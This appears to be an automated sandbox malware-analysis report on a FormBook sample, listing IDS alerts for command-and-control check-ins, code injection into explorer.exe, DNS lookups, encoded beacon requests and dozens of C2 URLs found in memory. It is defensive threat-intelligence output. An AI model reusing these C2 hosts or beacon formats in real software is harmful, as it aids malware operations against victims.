Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49992 -> 44.227.65.245:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49988 -> 104.18.14.105:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49988 -> 104.18.14.105:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49988 -> 104.18.14.105:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49993 -> 118.27.100.151:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49993 -> 118.27.100.151:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49993 -> 118.27.100.151:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49994 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49994 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49994 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49991 -> 172.96.187.89:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49991 -> 172.96.187.89:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49991 -> 172.96.187.89:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 103.235.47.188 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.upcyclecharms.com/md02/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.zbbnp.xyz
Source:	DNS query: www.a1b5v.xyz

Source: global traffic	HTTP traffic detected: GET /md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA== HTTP/1.1Host: www.zruypj169g.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /md02/?0PG4QdD=t+COfq1vjUEJQNGKuIffQF6Jo9EOeFI2rokLIpdDcdgn8qfouM+tADvwOSJNkXtOfnwg5pSvDA==&oHH8=VZUPDXU8mXkToFn HTTP/1.1Host: www.33mgbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 103.235.47.188 103.235.47.188
Source: Joe Sandbox View	IP Address: 103.235.47.188 103.235.47.188

Source: Joe Sandbox View	ASN Name: BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 6_2_0E236F82 getaddrinfo,setsockopt,recv,

6_2_0E236F82

Source: global traffic	HTTP traffic detected: GET /md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA== HTTP/1.1Host: www.zruypj169g.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /md02/?0PG4QdD=t+COfq1vjUEJQNGKuIffQF6Jo9EOeFI2rokLIpdDcdgn8qfouM+tADvwOSJNkXtOfnwg5pSvDA==&oHH8=VZUPDXU8mXkToFn HTTP/1.1Host: www.33mgbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.zruypj169g.top
Source: global traffic	DNS traffic detected: DNS query: www.teplo-invest.com
Source: global traffic	DNS traffic detected: DNS query: www.zbbnp.xyz
Source: global traffic	DNS traffic detected: DNS query: www.33mgbet.com
Source: global traffic	DNS traffic detected: DNS query: www.a1b5v.xyz
Source: global traffic	DNS traffic detected: DNS query: www.lynxpire.com
Source: global traffic	DNS traffic detected: DNS query: www.chiri.lat
Source: global traffic	DNS traffic detected: DNS query: www.rslotrank.win
Source: global traffic	DNS traffic detected: DNS query: www.partymaxclubmen36.click
Source: global traffic	DNS traffic detected: DNS query: www.tdshomesolution.com
Source: global traffic	DNS traffic detected: DNS query: www.onsen1508.com
Source: global traffic	DNS traffic detected: DNS query: www.barnesassetrecovery.store

Source: explorer.exe, 00000006.00000000.2137414570.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: Iifpj4i2kC.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: Iifpj4i2kC.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: explorer.exe, 00000006.00000000.2137414570.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000000.2137414570.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: Iifpj4i2kC.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: Iifpj4i2kC.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: explorer.exe, 00000006.00000000.2137414570.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: Iifpj4i2kC.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000006.00000000.2133543860.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4565658738.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4565685064.0000000007B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.33mgbet.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.33mgbet.com/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.33mgbet.com/md02/www.a1b5v.xyz
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.33mgbet.comReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a1b5v.xyz
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a1b5v.xyz/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a1b5v.xyz/md02/www.lynxpire.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.a1b5v.xyzReferer:
Source: explorer.exe, 00000006.00000003.2980304838.000000000C405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000C3E8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.barnesassetrecovery.store
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.barnesassetrecovery.store/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.barnesassetrecovery.store/md02/www.upcyclecharms.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.barnesassetrecovery.storeReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.chiri.lat
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.chiri.lat/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.chiri.lat/md02/www.rslotrank.win
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.chiri.latReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hecxion.xyz
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hecxion.xyz/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hecxion.xyz/md02/www.mamasprinkleofjoy.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hecxion.xyzReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lynxpire.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lynxpire.com/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lynxpire.com/md02/www.chiri.lat
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lynxpire.comReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mamasprinkleofjoy.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mamasprinkleofjoy.com/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mamasprinkleofjoy.com/md02/www.rakring.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mamasprinkleofjoy.comReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.onsen1508.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.onsen1508.com/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.onsen1508.com/md02/www.barnesassetrecovery.store
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.onsen1508.comReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.partymaxclubmen36.click
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.partymaxclubmen36.click/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.partymaxclubmen36.click/md02/www.tdshomesolution.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.partymaxclubmen36.clickReferer:
